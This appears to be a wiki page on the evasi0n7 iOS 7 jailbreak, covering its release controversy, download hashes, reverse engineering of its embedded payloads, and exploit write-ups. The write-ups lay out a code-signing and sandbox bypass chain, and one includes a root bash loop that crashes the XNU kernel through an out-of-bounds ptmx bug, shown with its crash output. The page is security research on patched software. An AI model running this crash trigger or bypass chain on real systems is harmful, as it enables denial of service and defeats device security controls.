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evasi0n7
This page is about the untethered jailbreak for iOS 7.0.x. For the untethered jailbreak for iOS 6.0 through 6.1.2, see evasi0n.
evasi0n7 1.0.4 on OS X | |
Original author(s) | evad3rs |
Developer(s) | evad3rs |
Initial release | 22 Dec 2013 |
Stable release | 1.0.7 / 1 Mar 2014 |
Preview release | 1.0.8 / 27 Mar 2014 |
Development status | Deprecated |
Written in | C |
Operating system | Windows / OS X |
Size |
Windows 1.0.7: 16.18 MiB [ZIP] Windows 1.0.8: 16.17 MiB [ZIP] OS X 1.0.7: 15.82 MiB [DMG] OS X 1.0.8: 15.80 MiB [DMG] |
Available in | English |
Type | Jailbreaking |
License | Freeware |
Website | evasi0n.com |
evasi0n7 is a jailbreak program from the evad3rs. It performs an untethered jailbreak for all devices on iOS 7.0 through 7.1 beta 3, except the Apple TV. It was initially released on 22 December 2013, and became subject to controversy and criticism. On 28 December 2013, the Cydia package went live to saurik's repo.
Contents
Controversy
The release of evasi0n7 was met with sharp criticism. It came without advance notice, much to the dismay of jailbreak developers, including saurik.[1] It is believed that this was done in response to Geohot trying to sell the jailbreak,[2] a claim which Geohot later brushed off. In addition, if the user's language was set to Chinese, a different app store, the TaiG app store would be installed by default. This store contained cracked versions of App Store apps and Cydia apps.[3][4] The evad3rs were reportedly unaware of the included piracy when they formed the deal, and remotely disabled that store's installation several hours later[5]. The evad3rs put out letters to the community during this - Part 1 and Part 2.
Supported Devices
The only unsupported devices are those of the Apple TV family. All other devices capable of running iOS 7 are supported.
Apple TV's
- evasi0n7 is not capable of jailbreaking the Apple TV's. According to nitoTV, in his "Why isn't the Apple TV 3 jailbroken?" WWJC 2014 talk (video), evasi0n7 would have been able to jailbreak the Apple TV (2nd generation) but was never updated to properly support it.
Download
Version | OS | SHA-1 Hash | Download | Changes | |
---|---|---|---|---|---|
1.0.0 | OS X | 6b22e1d94988a76244d08a5592576f61a0cb5ffb
|
Box | MEGA | Initial release |
Windows | 8a4e1fcd7b1fc0084366c182cbcf850dfc45d59f
|
Box | MEGA | ||
1.0.1 | OS X | 12b98c49046157b6206d1c099fe872d6c5e79fb1
|
Box | MEGA | TaiG is not bundled and not installed anymore with evasi0n7 in Chinese language operating systems |
Windows | 52367f1fb3b71b38ad9ba3ac427a771a498790ad
|
Box | MEGA | ||
1.0.2 | OS X | da8d03d9e678f5866af0babe1882fa27cd236bad
|
Box | MEGA | Fix for iPad 2 (iPad2,1) boot loop issues. |
Windows | d61c8cbb565efa7d651e3c6cdc8429e2446396d1
|
Box | MEGA | ||
1.0.3 | OS X | da50834734eb013982de5e6f7dda79660f655c18
|
Box | MEGA | Updated bundled Cydia Now double checking HFS modifications (for the iPad mini 2 (iPad4,5) reboot loop issue) Support for iOS 7.1 beta 3 |
Windows | 57e94aadcc30fc778dc0478ac6e89f19904adcf6
|
Box | MEGA | ||
1.0.4 | OS X | 879060a10942011da7ad5697e65122de6e25a3a1
|
Box | MEGA | Security fix: kernel payload now restores sysent tableSecurity fix: code fix for bootstrap Cydia tar files verification |
Windows | 3ef7cb618288a9ff1220a71a2f887e21779c3a16
|
Box | MEGA | ||
1.0.5 | OS X | a81a7128113a7610371a2f9f99933a1dbd153c42
|
Box | MEGA | Support for iOS 7.0.5 |
Windows | 5e09dfac4b4a0361492961109da72f6f18020d59
|
Box | MEGA | ||
1.0.6 | OS X | f77a75a092dbbeb483e3138392253413355e2e17
|
Box | MEGA | Support for iOS 7.0.6 |
Windows | 5bda570b03aebad86286dd446bb4a1edf015b051
|
Box | MEGA | ||
1.0.7 | OS X | cca338007dc37a456a0f2b2f3bf1cf015a4222c0
|
Box | MEGA | Fix problem where bundled repository package information could not be refreshed/updated by Cydia Updated bundled Cydia package lists |
Windows | 3ac4deefadc76122c33f3181135f01217aeb3777
|
Box | MEGA | ||
1.0.8 | OS X | 19c9cfaf2754f024648fee25540ae57647176ade
|
Box | MEGA | Support for iOS 7.0 (11A466) that shipped with some iPhone 5s and iPhone 5c |
Windows | c04822c26f84f20107f9b88c1888b3b34f349621
|
Box | MEGA |
Note: evasi0n7 1.0.8 is known to cause boot loops. 1.0.8 has since been taken down from the evad3rs' website, and users are advised to use 1.0.7 unless you have an iPhone 5s/iPhone 5c running iOS 7.0 (build 11A466).
Research
Mach-O (OS X binary)
evasi0n7 is a single architecture (i386) unsigned binary. The app is self-contained, meaning it packages all of its resources into the Mach-O. Using jtool to inspect the Mach-O header of the binary shows that there is some added sections in the __DATA
segment.
bash$ jtool -l ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 ... LC 02: LC_SEGMENT Mem: 0x00170000-0x01d09000 __DATA Mem: 0x00170000-0x00170008 __DATA.__dyld Mem: 0x00170008-0x00170060 __DATA.__nl_symbol_ptr (Non-Lazy Symbol Ptrs) Mem: 0x00170060-0x001703d4 __DATA.__la_symbol_ptr (Lazy Symbol Ptrs) Mem: 0x001703d4-0x001703d8 __DATA.__mod_init_func (Module Init Function Ptrs) Mem: 0x001703d8-0x001705d0 __DATA.__const Mem: 0x001705d0-0x00171c14 __DATA.__data Mem: 0x00171c14-0x00171c64 __DATA.__cfstring Mem: 0x00171c64-0x001a942d __DATA.data_3 Mem: 0x001a942d-0x0087b92c __DATA.data_4 Mem: 0x0087b92c-0x0087be18 __DATA.data_5 Mem: 0x0087be18-0x0087c2f8 __DATA.data_6 Mem: 0x0087c2f8-0x008fb944 __DATA.data_7 Mem: 0x008fb944-0x008fba7f __DATA.data_8 Mem: 0x008fba7f-0x008fbeac __DATA.data_9 Mem: 0x008fbeac-0x0160f3a1 __DATA.data_10 Mem: 0x0160f3a1-0x016101ac __DATA.data_11 Mem: 0x016101ac-0x01d083dd __DATA.data_12 Mem: 0x01d08400-0x01d084cc __DATA.__common (Zero Fill) Mem: 0x01d084cc-0x01d0866c __DATA.__bss (Zero Fill) ...
The Mach-O ABI[6] describes the __DATA segment as:
The __DATA segment contains writable data. The static linker sets the virtual memory permissions of this segment to allow both reading and writing. Because it is writable, the __DATA segment of a framework or other shared library is logically copied for each process linking with the library. When memory pages such as those making up the __DATA segment are readable and writable, the kernel marks them copy-on-write; therefore when a process writes to one of these pages, that process receives its own private copy of the page.
This means additional sections can be added using compiler flags, and these will be treated as raw data and added to the header and binary contents. Specifically they were called data_3 through data_12, and this is where the payloads used for jailbreak process are stored. At runtime, the evasi0n app was loading these data segments into memory to prepare to use them when jailbreaking.
Payload Extraction
The locations of the payloads have been identified, and they can be extracted and examined. To extract the payloads from the binary and dump the data into a file that can be examined:
bash$ jtool -e __DATA.data_3 ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 Requested section found at Offset 1510500 Extracting __DATA.data_3 at 1510500, 227273 (377c9) bytes into evasi0n7.__DATA.data_3
Payload Format
Before examining the dumped payload files, some information can be gathered from other parts of the Mach-O binary. By dumping the symbol table from the binary, it is possible to see the names of functions used in the binary that are linked to in external libraries. Something that stands out in the evasi0n binary is the usage of the gzip library.
bash $ dsymutil -s ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 ---------------------------------------------------------------------- Symbol table for: './evasi0n 7.app/Contents/MacOS/evasi0n7' (i386) ---------------------------------------------------------------------- Index n_strx n_type n_sect n_desc n_value ======== -------- ------------------ ------ ------ ---------------- ... [ 164] 00000ab1 01 ( UNDF EXT) 00 0a00 0000000000000000 '_getcwd' [ 165] 00000ab9 01 ( UNDF EXT) 00 0a00 0000000000000000 '_getsectdata'
"_getsectdata" Suggests it is used to get the data from a particular data section from the Mach-O header
[ 166] 00000ac6 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzclose' [ 167] 00000acf 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzopen' [ 168] 00000ad7 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzread' [ 169] 00000adf 01 ( UNDF EXT) 00 0100 0000000000000000 '_gzseek' [ 170] 00000ae7 01 ( UNDF EXT) 00 0100 0000000000000000 '_inflate' [ 171] 00000af0 01 ( UNDF EXT) 00 0100 0000000000000000 '_inflateEnd' [ 172] 00000afc 01 ( UNDF EXT) 00 0100 0000000000000000 '_inflateInit2_' ...
From that, it can be deduced that the payloads that were extracted are compressed using gzip. This can be verified by running the command file
on the extracted payloads.
bash $ file ./evasi0n7.__DATA.data_3 evasi0n7.__DATA.data_3: gzip compressed data, from Unix, last modified: Sun Dec 22 05:54:11 2013
After decompressing the gzip file there is a new file, again test that with file
.
bash $ mv ./evasi0n7.__DATA.data_3 ./evasi0n7.__DATA.data_3.gz bash $ gunzip ./evasi0n7.__DATA.data_3.gz bash $ file ./evasi0n7.__DATA.data_3 evasi0n7.__DATA.data_3: POSIX tar archive
Seems that the payloads were stored as simply .tar.gz
files dumped directly into the Mach-O header of the binary.
Payload Contents
Now having an understanding of how the payloads were supposed to be used and packaged, their contents can be examined in detail to see what they are used for.
bash $ tar ztvf ./evasi0n7.__DATA.data_3 drwxr-xr-x 0 planetbeing staff 0 Dec 22 00:20 ./ drwxr-xr-x 0 planetbeing staff 0 Dec 17 18:27 ./Applications/ drwxr-xr-x 0 planetbeing staff 0 Dec 21 07:25 ./etc/ drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/ drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:57 ./usr/ drwxr-xr-x 0 planetbeing staff 0 Dec 19 04:18 ./usr/bin/ drwxr-xr-x 0 planetbeing staff 0 Oct 31 23:14 ./usr/libexec/ drwxr-xr-x 0 planetbeing staff 0 Dec 18 19:11 ./usr/libexec/cydia/ -rwxr-xr-x 0 planetbeing staff 3363 Dec 18 23:59 ./usr/libexec/cydia/firmware.sh -rwxr-xr-x 0 planetbeing staff 228 Dec 17 20:43 ./usr/libexec/cydia/free.sh -rwxr-xr-x 0 planetbeing staff 132848 Dec 18 18:57 ./usr/bin/gssc -rwxr-xr-x 0 planetbeing staff 200352 Dec 19 04:18 ./usr/bin/uicache drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/var/ drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/var/lib/ drwxr-xr-x 0 planetbeing staff 0 Dec 18 18:34 ./private/var/lib/dpkg/ drwxr-xr-x 0 planetbeing staff 0 Dec 22 00:12 ./private/var/lib/dpkg/info/ -rw-r--r-- 0 planetbeing staff 393 Dec 18 18:40 ./private/var/lib/dpkg/info/com.evad3rs.evasi0n7.list -rwxr-xr-x 0 planetbeing staff 678 Dec 18 18:52 ./private/var/lib/dpkg/info/com.evad3rs.evasi0n7.prerm -rw-r--r-- 0 planetbeing staff 5137 Dec 22 00:12 ./private/var/lib/dpkg/info/cydia.list drwxr-xr-x 0 planetbeing staff 0 Dec 21 23:31 ./Applications/Cydia.app/ -rwxr-xr-x 0 planetbeing staff 211 Dec 21 22:52 ./Applications/Cydia.app/Cydia -rwsr-sr-x 0 planetbeing staff 131824 Dec 22 00:00 ./Applications/Cydia.app/CydiaWrapper -rwsr-sr-x 0 planetbeing staff 382608 Dec 17 20:50 ./Applications/Cydia.app/MobileCydia -rwxr-xr-x 0 planetbeing staff 66960 Dec 22 00:04 ./Applications/Cydia.app/udidfix.dylib
- __data3 contains Cydia.
- __data4 contains Cydia subsystems (/bin, /usr/bin) and their supported libraries (/usr/lib)
- __data5 contains a Mach-O universal binary (ARMv7/ARMv7s,ARMv8) which is installed in the root file system
- __data6 contains a dylib (likely game over.dyliib) which exports the same symbols as libmis.dylib (used by amfid for code signature verification), but overrides them to return true
- __data7 contains another Mach-O binary (ARMv7/ARMv8), likely evasi0n7, which is installed in the root filesystem during the jailbreak
- __data8 contains the plist (property list) file used by evasion to register as a launchDaemon
- __data9 contains a dylib which overrides the sandbox dylib (similar to __data6, but to enable evasion to avoid the sandbox)
- __data10 contained the TaiG app and subsystems (similar to Cydia) - removed in 1.01 due to negative backlash
- __data11 contains a binary plist of strings used by the evasion binary
- __data12 contains the Cydia repo list
Network Access
Noteably, when attempting to run the evasi0n.app without an active or accessible network connection, it will display a prompt that says it requires a network connection to be used. This is very true, as it needs to download the WWDC app as part of the exploit. However the app doesn't exhibit any of the typical commands for network access via Cocoa or CF APIs. Examining the symbol table we do see that there are references to "send", "recv", and other C-socket calls, however they appear to be used exclusively for the unix socket to communicate directly with the iOS device.
Examining the list of libraries linked to the binary gives some insight to how it was checking for a network connection.
bash $ otool -L ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 ./evasi0n 7.app/Contents/MacOS/evasi0n7: /usr/lib/libz.1.dylib (compatibility version 1.0.0, current version 1.2.5) /usr/lib/libxml2.2.dylib (compatibility version 10.0.0, current version 10.9.0) /usr/lib/libssl.0.9.8.dylib (compatibility version 0.9.8, current version 50.0.0) /usr/lib/libcrypto.0.9.8.dylib (compatibility version 0.9.8, current version 50.0.0) /usr/lib/libcurl.4.dylib (compatibility version 7.0.0, current version 8.0.0) /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation (compatibility version 150.0.0, current version 855.11.0) /usr/lib/libobjc.A.dylib (compatibility version 1.0.0, current version 228.0.0) /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit (compatibility version 1.0.0, current version 275.0.0) /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa (compatibility version 1.0.0, current version 20.0.0) /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1197.1.1) /usr/lib/libstdc++.6.dylib (compatibility version 7.0.0, current version 60.0.0) /usr/lib/libgcc_s.1.dylib (compatibility version 1.0.0, current version 2577.0.0) /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit (compatibility version 45.0.0, current version 1265.0.0) /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation (compatibility version 300.0.0, current version 1056.0.0)
This stands out due to the compatibility version listed being higher than the version OS X 10.6.8, which was oldest version of OS X that evasi0n.app claimed to support. Checking the symbol table again evidence of how libcurl
can be seen.
bash $ dsymutil -s ./evasi0n\ 7.app/Contents/MacOS/evasi0n7 ---------------------------------------------------------------------- Symbol table for: './evasi0n 7.app/Contents/MacOS/evasi0n7' (i386) ---------------------------------------------------------------------- Index n_strx n_type n_sect n_desc n_value ======== -------- ------------------ ------ ------ ---------------- ... [ 133] 00000938 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_cleanup' [ 134] 0000094b 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_getinfo' [ 135] 0000095e 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_init' [ 136] 0000096e 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_perform' [ 137] 00000981 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_setopt' [ 138] 00000993 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_easy_strerror' [ 139] 000009a7 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_global_cleanup' [ 140] 000009bc 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_global_init' [ 141] 000009ce 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_slist_append' [ 142] 000009e1 01 ( UNDF EXT) 00 0500 0000000000000000 '_curl_slist_free_all' ...
Digging into the code in the binary, it appears as these commands are used to do a check against the address http://evasi0n.com/ex.plistx
. This appears to be a binary file that dictates the internal operation of the evasi0n7.app. Specifically it is known to be able to enable and disable ability to install the TaiG payloads.
Language Checks
The major controversy surrounding this release was that the evasi0n7.app would do a check against the locale and language settings of the computer being run on to see if it was set to Chinese. If this check was successful, it would install the TaiG app store by default instead of Cydia, and present Cydia as a secondary option. This was quickly discovered and patched to remove this functionally by both TaiG and @Dirk_Gently.
Version | OS | Offset | Changes | Result |
---|---|---|---|---|
1.0.0 (evad3rs) | Mac OS X | 0xb0947 | Modify String "zh" to "xx" | Check always fails |
Windows | 0x2e5f8 | Replace "E8C30000008A00" with "9090909090B000" | ||
1.0.0 (TaiG) | Replace "9090909090B001" with "9090909090B000" |
Exploit Breakdowns
Write-up by Braden Thomas
- WWDC.app is downloaded from app store and uploaded over AFC to ~/Media/Downloads
- An IPA containing WWDC.app is uploaded and installed using MobileInstall, but first, the Info.plist in the WWDC app in the IPA is changed so that CFBundleExecutable points to the untouched copy of the app in Downloads
- when MobileInstall installs the app, it signature checks the copy in Downloads, signature check passes and app is installed
- WWDC.app/WWDC is overwritten using AFC with a #! script to point to afcd the command line in #! will expose the entire / over afc port 8888
- a dylib (gameover) is uploaded which uses a CS bypass (vmsize 0) to neuter sandboxing in afcd using LINKEDIT section (afcd starts its sandbox at runtime using sandbox_init*)
- a LaunchServices bug is used to make that app load that library when it runs the device reboots and the user is instructed to run the app
- when the app runs, afcd runs exposing /, and the sandbox is neutered, allowing access everywhere however, iOS 7 kernel still prevents remapping / as writable so it's still just readonly
- at this point, /var/mobile/Library/Logs/AppleSupport is symlinked to /dev/rdisk0s1 the device is rebooted, and something early in boot (i believe ReportCrash) will chown that path to mobile which chowns rdisk
- they have an HFS library that has an AFC backend, so they're able to virtually mount the entire system partition via AFC by seeking around on the rdisk using AFC commands. so using that, they modify the system partition the changes to the system partition are adding an executable which is signed with a self-signed cert at /evasi0n7 and a launchd plist to run it at boot
- they use the same CS bypass used before to modify libmis.dylib which is loaded by amfid (which checks code signatures) to neuter the amfi checks and always return true (i.e. to MISValidateSignature)
- so evasi0n will run fine, and at that point it does the kernel portion
- they also have to do this trick involving another codeless library containing this xpcd_cache blob to bypass a change in iOS 7 (or was it 6) where launchctl will only load plists from signed libraries
See followups at @drspringfield.
Write-up by geohot
geohot presented an evasi0n7 writeup on his website here.
Write-up by p0sixninja
The vulnerability is an out of bounds array in the _state.pis_ioctl_list array by specifying an overly large minor device node number. By placing data in a known location past the array it's possible to hijack the tty structure and special read and write data from ioctl calls, and control function pointers to control execution.
The exploit is actually quite simple to trigger. I discovered this with a simple fuzzing script to test out every single device node. Here's a small sample script that should crash the latest maverick update. please run this as root.
#!/bin/bash for i in `seq 1 255`; do echo "Node $i"; mknod /dev/crash c 16 $i; echo "Hello World" >/dev/crash; rm -rf /dev/crash; done;
The 16 major device node actually is mapped to the ptmx/ptsd pseudo terminal system. It seems that only 16 spaces are allocated for these terminals and if you make a device node with major 16 and minor larger that 16 you start getting out of bounds of the array. The maximum size of device nodes are about 0x600000 giving to the ability to offset your pointer into a crafted structure very large. The only hard part is finding which zones are ahead of your array you can index into. The exploit itself is in the bsd/kernel/tty_ptmx.c file in XNU kernel. The crash happens in…
int ptsd_open(dev_t dev, int flag, __unused int devtype, __unused proc_t p);
The problem is they lack the check to see if the minor number is higher than the number of spots allocated. The problem comes down to this, I'll try to comment code as I go through it...
FREE_BSDSTATIC int ptsd_open(dev_t dev, int flag, __unused int devtype, __unused proc_t p) { struct tty *tp; struct ptmx_ioctl *pti; int error; /* * The dev_t structure holds the bits extracted and used to offset * in an array */ // We'll check this function out first, check below if ((pti = ptmx_get_ioctl(minor(dev), 0)) == NULL) { return (ENXIO); } // Here's where the crash happens if (!(pti->pt_flags & PF_UNLOCKED)) { return (EAGAIN); } // This is the pointer we want to control tp = pti->pt_tty; tty_lock(tp); if ((tp->t_state & TS_ISOPEN) == 0) { termioschars(&tp->t_termios); /* Set up default chars */ tp->t_iflag = TTYDEF_IFLAG; tp->t_oflag = TTYDEF_OFLAG; tp->t_lflag = TTYDEF_LFLAG; tp->t_cflag = TTYDEF_CFLAG; tp->t_ispeed = tp->t_ospeed = TTYDEF_SPEED; ttsetwater(tp); /* would be done in xxparam() */ } else if (tp->t_state&TS_XCLUDE && suser(kauth_cred_get(), NULL)) { error = EBUSY; goto out; } if (tp->t_oproc) /* Ctrlr still around. */ (void)(*linesw[tp->t_line].l_modem)(tp, 1); while ((tp->t_state & TS_CARR_ON) == 0) { if (flag&FNONBLOCK) break; error = ttysleep(tp, TSA_CARR_ON(tp), TTIPRI | PCATCH, "ptsd_opn", 0); if (error) goto out; } error = (*linesw[tp->t_line].l_open)(dev, tp); /* Successful open; mark as open by the slave */ pti->pt_flags |= PF_OPEN_S; CLR(tp->t_state, TS_IOCTL_NOT_OK); if (error == 0) ptmx_wakeup(tp, FREAD|FWRITE); out: tty_unlock(tp); return (error); }
/* * Given a minor number, return the corresponding structure for that minor * number. If there isn't one, and the create flag is specified, we create * one if possible. * * Parameters: minor Minor number of ptmx device * open_flag PF_OPEN_M First open of master * PF_OPEN_S First open of slave * 0 Just want ioctl struct * * Returns: NULL Did not exist/could not create * !NULL structure corresponding minor number * * Locks: tty_lock() on ptmx_ioctl->pt_tty NOT held on entry or exit. */ static struct ptmx_ioctl * ptmx_get_ioctl(int minor, int open_flag) { struct ptmx_ioctl *new_ptmx_ioctl; // For normal open() syscalls this flag is never set if (open_flag & PF_OPEN_M) { /* * If we are about to allocate more memory, but we have * already hit the administrative limit, then fail the * operation. * * Note: Subtract free from total when making this * check to allow unit increments, rather than * snapping to the nearest PTMX_GROW_VECTOR... */ if ((_state.pis_total - _state.pis_free) >= ptmx_max) { return (NULL); } MALLOC(new_ptmx_ioctl, struct ptmx_ioctl *, sizeof(struct ptmx_ioctl), M_TTYS, M_WAITOK|M_ZERO); if (new_ptmx_ioctl == NULL) { return (NULL); } if ((new_ptmx_ioctl->pt_tty = ttymalloc()) == NULL) { FREE(new_ptmx_ioctl, M_TTYS); return (NULL); } /* * Hold the DEVFS_LOCK() over this whole operation; devfs * itself does this over malloc/free as well, so this should * be safe to do. We hold it longer than we want to, but * doing so avoids a reallocation race on the minor number. */ DEVFS_LOCK(); /* Need to allocate a larger vector? */ if (_state.pis_free == 0) { struct ptmx_ioctl **new_pis_ioctl_list; struct ptmx_ioctl **old_pis_ioctl_list = NULL; /* Yes. */ MALLOC(new_pis_ioctl_list, struct ptmx_ioctl **, sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), M_TTYS, M_WAITOK|M_ZERO); if (new_pis_ioctl_list == NULL) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); FREE(new_ptmx_ioctl, M_TTYS); return (NULL); } /* If this is not the first time, copy the old over */ bcopy(_state.pis_ioctl_list, new_pis_ioctl_list, sizeof(struct ptmx_ioctl *) * _state.pis_total); old_pis_ioctl_list = _state.pis_ioctl_list; _state.pis_ioctl_list = new_pis_ioctl_list; _state.pis_free += PTMX_GROW_VECTOR; _state.pis_total += PTMX_GROW_VECTOR; if (old_pis_ioctl_list) FREE(old_pis_ioctl_list, M_TTYS); } if (_state.pis_ioctl_list[minor] != NULL) { ttyfree(new_ptmx_ioctl->pt_tty); DEVFS_UNLOCK(); FREE(new_ptmx_ioctl, M_TTYS); /* Special error value so we know to redrive the open, we've been raced */ return (struct ptmx_ioctl*)-1; } /* Vector is large enough; grab a new ptmx_ioctl */ /* Now grab a free slot... */ _state.pis_ioctl_list[minor] = new_ptmx_ioctl; /* reduce free count */ _state.pis_free--; _state.pis_ioctl_list[minor]->pt_flags |= PF_OPEN_M; DEVFS_UNLOCK(); /* Create the /dev/ttysXXX device {<major>,XXX} */ _state.pis_ioctl_list[minor]->pt_devhandle = devfs_make_node( makedev(ptsd_major, minor), DEVFS_CHAR, UID_ROOT, GID_TTY, 0620, PTSD_TEMPLATE, minor); if (_state.pis_ioctl_list[minor]->pt_devhandle == NULL) { printf("devfs_make_node() call failed for ptmx_get_ioctl()!!!!\n"); } } else if (open_flag & PF_OPEN_S) { DEVFS_LOCK(); _state.pis_ioctl_list[minor]->pt_flags |= PF_OPEN_S; DEVFS_UNLOCK(); } // No else statement to catch errors just return the index to the array faithfully. return (_state.pis_ioctl_list[minor]); }
First notice the (open_flag & PF_OPEN_M), if this is not true a lot of code will be skipped. on the ptmx devices, this isn't set so all this is complete skipped and we can skip to the end of the the code since there is no all catching else clause to handle most connections. It just automatically returns this array indexed with a user controllable value. Crash but true, let's look more into this structure we can control if we create a large minor number.
static struct _ptmx_ioctl_state { struct ptmx_ioctl **pis_ioctl_list; /* pointer vector */ int pis_total; /* total slots */ int pis_free; /* free slots */ } _state;
This just contains a pointer vector of ptmx_ioctl structures, let's look at the structure which should be contained in the minor number offset.
/* * ptmx_ioctl is a pointer to a list of pointers to tty structures which is * grown, as necessary, copied, and replaced, but never shrunk. The ioctl * structures themselves pointed to from this list come and go as needed. */ struct ptmx_ioctl { struct tty *pt_tty; /* pointer to ttymalloc()'ed data */ int pt_flags; struct selinfo pt_selr; struct selinfo pt_selw; u_char pt_send; u_char pt_ucntl; void *pt_devhandle; /* cloned slave device handle */ };
The first pointer in this structure is a pointer to a tty structure. This structure is easily readable and writable using using user land APIS. It also includes some function pointers in there which can be triggered to gain
struct tty { lck_mtx_t t_lock; /* Per tty lock */ struct clist t_rawq; /* Device raw input queue. */ long t_rawcc; /* Raw input queue statistics. */ struct clist t_canq; /* Device canonical queue. */ long t_cancc; /* Canonical queue statistics. */ struct clist t_outq; /* Device output queue. */ long t_outcc; /* Output queue statistics. */ int t_line; /* Interface to device drivers. */ dev_t t_dev; /* Device. */ int t_state; /* Device and driver (TS*) state. */ int t_flags; /* Tty flags. */ int t_timeout; /* Timeout for ttywait() */ struct pgrp *t_pgrp; /* Foreground process group. */ struct session *t_session; /* Enclosing session. */ struct selinfo t_rsel; /* Tty read/oob select. */ struct selinfo t_wsel; /* Tty write select. */ struct termios t_termios; /* Termios state. */ struct winsize t_winsize; /* Window size. */ /* Start output. */ void (*t_oproc)(struct tty *); /* Stop output. */ void (*t_stop)(struct tty *, int); /* Set hardware state. */ int (*t_param)(struct tty *, struct termios *); void *t_sc; /* XXX: net/if_sl.c:sl_softc. */ int t_column; /* Tty output column. */ int t_rocount, t_rocol; /* Tty. */ int t_hiwat; /* High water mark. */ int t_lowat; /* Low water mark. */ int t_gen; /* Generation number. */ void *t_iokit; /* IOKit management */ int t_refcnt; /* reference count */ };
You can imagine all the power you could do if you can control all these structures carefully. That will be the difficulty when trying to exploit. You need to find a kernel zone past this array and allocate your data into it in a way you always know the offset. shouldn't be too hard.
Here's what the crash looks like once triggered.
bash-3.2# for i in `seq 1 255`;do echo $i; mknod /dev/crash c 16 $i;echo "Hello" >/dev/crash;rm -rf /dev/crash;done
in gdb remote kernel debugger…
gdb$ bt #0 0xffffff8024f35fbc in ptsd_open (dev=0x10000010, flag=0x402, devtype=0x2000, p=0xffffff803655a3f8) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/kern/tty_ptmx.c:571 #1 0xffffff8024bdd93f in spec_open (ap=0xffffff8225cb3928) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/miscfs/specfs/spec_vnops.c:325 #2 0xffffff8024bc43c9 in VNOP_OPEN (vp=0xffffff803809c110, mode=0x402, ctx=0xffffff8035bcdd08) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/kpi_vfs.c:3015 #3 0xffffff8024bb4eab in vn_open_auth (ndp=0xffffff8225cb3b70, fmodep=0xffffff8225cb3adc, vap=0xffffff8225cb3d08) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_vnops.c:591 #4 0xffffff8024b9d8db in open1 (ctx=0xffffff8035bcdd08, ndp=0xffffff8225cb3b70, uflags=0x601, vap=0xffffff8225cb3d08, fp_zalloc=0xffffff8024ecf0b0 <fileproc_alloc_init>, cra=0x0, retval=0xffffff8035bcdc18) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_syscalls.c:3067 #5 0xffffff8024b9e684 in open_nocancel (p=0xffffff803655a3f8, uap=0xffffff8035c3a920, retval=0xffffff8035bcdc18) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_syscalls.c:3345 #6 0xffffff8024b9e4fc in open (p=0xffffff803655a3f8, uap=0xffffff8035c3a920, retval=0xffffff8035bcdc18) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/vfs/vfs_syscalls.c:3326 #7 0xffffff8024fa3828 in unix_syscall64 (state=0xffffff8035c3a910) at /SourceCache/xnu_debug/xnu-2422.1.72/bsd/dev/i386/systemcalls.c:370 gdb$ i r rax 0xdeadbeefdeadbeef 0xdeadbeefdeadbeef rbx 0xffffff80367ea168 0xffffff80367ea168 rcx 0xffffff8033ec8788 0xffffff8033ec8788 rdx 0x10 0x10 rsi 0x0 0x0 rdi 0x10 0x10 rbp 0xffffff8225cb3870 0xffffff8225cb3870 rsp 0xffffff8225cb3840 0xffffff8225cb3840 r8 0x402 0x402 r9 0x1 0x1 r10 0xffffff80327c6220 0xffffff80327c6220 r11 0x0 0x0 r12 0xffffff8225cb3fc0 0xffffff8225cb3fc0 r13 0x7f9190c045b0 0x7f9190c045b0 r14 0xffffffff 0xffffffff r15 0xffffff8035c3a910 0xffffff8035c3a910 rip 0xffffff8024f35fbc 0xffffff8024f35fbc <ptsd_open+76> eflags 0x10282 0x10282 cs 0x8 0x8 ss 0x0 0x0 ds 0x0 0x0 es 0x0 0x0 fs 0xdead0000 0xdead0000 gs 0xdead0000 0xdead0000
it was trying to read in the value of _state.pis_ioctl_list[10].
gdb$ print _state.pis_ioctl_list[10] $1 = (struct ptmx_ioctl *) 0xdeadbeefdeadbeef
gdb$ print pti $2 = (struct ptmx_ioctl *) 0xdeadbeefdeadbeef
It crashes here before dereferenceing the tty structure at the beginning of the ptmx_ioctl structure. We must know it's an address, but we also leak a bit near the address if it is an address. We should also be able to retrieve the value of all these state variables it sets from variable bits wherever the pointer is at to see if it's the correct pointer or not.
571 * if (!(pti->pt_flags & PF_UNLOCKED)) { 572 return (EAGAIN); 573 } 574 575 tp = pti->pt_tty; 576 tty_lock(tp); 577 578 if ((tp->t_state & TS_ISOPEN) == 0) { 579 termioschars(&tp->t_termios); /* Set up default chars */
